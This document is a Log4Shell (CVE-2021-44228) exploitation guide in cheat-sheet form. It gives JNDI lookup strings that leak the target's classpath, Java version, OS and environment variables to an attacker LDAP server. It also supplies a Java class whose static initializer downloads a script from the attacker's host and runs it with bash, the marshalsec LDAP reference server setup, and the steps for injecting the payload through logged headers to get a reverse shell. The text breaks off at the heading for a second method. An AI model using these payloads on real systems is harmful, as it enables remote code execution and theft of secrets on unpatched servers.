Log4Shell Exploitation Guide

Enumerate Log4Shell

Start your LDAP server (see Method #1 below) and watch the incoming connection in Wireshark (Follow > TCP Stream). Log4j resolves the nested lookup on the target before contacting your server, so the resolved value (classpath, Java version, OS, environment variable) arrives as the search base of the LDAP request.

#Enumerate the server information (each inner lookup is resolved on the target and sent to your LDAP server)
#Classpath of the vulnerable application
${jndi:ldap://10.10.14.6:1389/${sys:java.class.path}}
#Java runtime version (decides whether remote class loading will work, see Notes)
${jndi:ldap://10.10.14.6:1389/${java:version}}
#Operating system
${jndi:ldap://10.10.14.6:1389/${java:os}}
#Any environment variable; replace myenv with the variable you want, e.g. PATH or HOME
${jndi:ldap://10.10.14.6:1389/${env:myenv}}

Method #1 Manual Way

Install Dependencies

sudo apt install maven openjdk-17-jdk -y

Creating the Malicious Java Class

RCE.java (the static initializer runs as soon as the target JVM loads the class, before any constructor is called)

public class RCE {
    static {
        try {
            // Stage 1: fetch the reverse-shell script from the attacker's web server
            Runtime r = Runtime.getRuntime();
            Process p = r.exec("wget http://KALIIP/x -O /tmp/x");
            p.waitFor();
            // Stage 2: execute it
            p = r.exec("/bin/bash /tmp/x");
            p.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public RCE() {
        System.out.println("Is this RCE?");
    }
}

Compile the Payload

Compile RCE.java for the JVM version the target runs, not for the JDK you just installed: a class file newer than the target JVM is rejected with UnsupportedClassVersionError and the lookup fails without any shell. With the JDK 17 toolchain above and a Java 8 target, use javac --release 8 RCE.java, which produces RCE.class.

Setting Up the JNDI Exploit Server

Clone and Build marshalsec

git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package -DskipTests

Start the LDAP Server

Serve RCE.class over HTTP (e.g. python3 -m http.server 8000 in the directory containing it), then start the reference server pointing at that URL; the fragment after # is the class name the target will load:

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://KALIIP:8000/#RCE"

Reverse Shell Payload

Create a file named x (RCE.java fetches http://KALIIP/x, so the name is case-sensitive) containing the reverse-shell payload, serve it on port 80 of the attacker machine, and start a listener on the port the payload connects back to:

Exploiting Log4Shell

Send the malicious JNDI lookup string in any input the application logs (a request header such as User-Agent or X-Api-Version, a form field or a query parameter), with your reverse-shell listener already running:

${jndi:ldap://KALIIP:1389/RCE}

When the target logs it, Log4j resolves the lookup, fetches the javaNamingReference from marshalsec, loads RCE.class from your web server, and the class's static initializer downloads and runs x.

Notes

  • Replace KALIIP (and 10.10.14.6 in the enumeration payloads) with your attacker machine's IP; the target must be able to reach it on the LDAP port (1389) and on the HTTP ports serving RCE.class and x.

  • Ensure the target application is vulnerable to Log4Shell (CVE-2021-44228: Log4j 2.0-beta9 through 2.14.1) and that the input you inject is actually written to a log, otherwise the lookup is never evaluated.

  • Remote class loading through an LDAP reference also requires the target JVM to trust remote codebases (com.sun.jndi.ldap.object.trustURLCodebase is false by default since Java 8u191 and 11.0.1), so check ${java:version} during enumeration; on newer JVMs a deserialization gadget is needed instead (Method #2).

  • The payload downloads and executes a remote shell script to establish a reverse shell, so the listener for that shell must be running before the lookup string is sent.

Example:

Got Reverse Shell

Method #2 ysoserial-modified
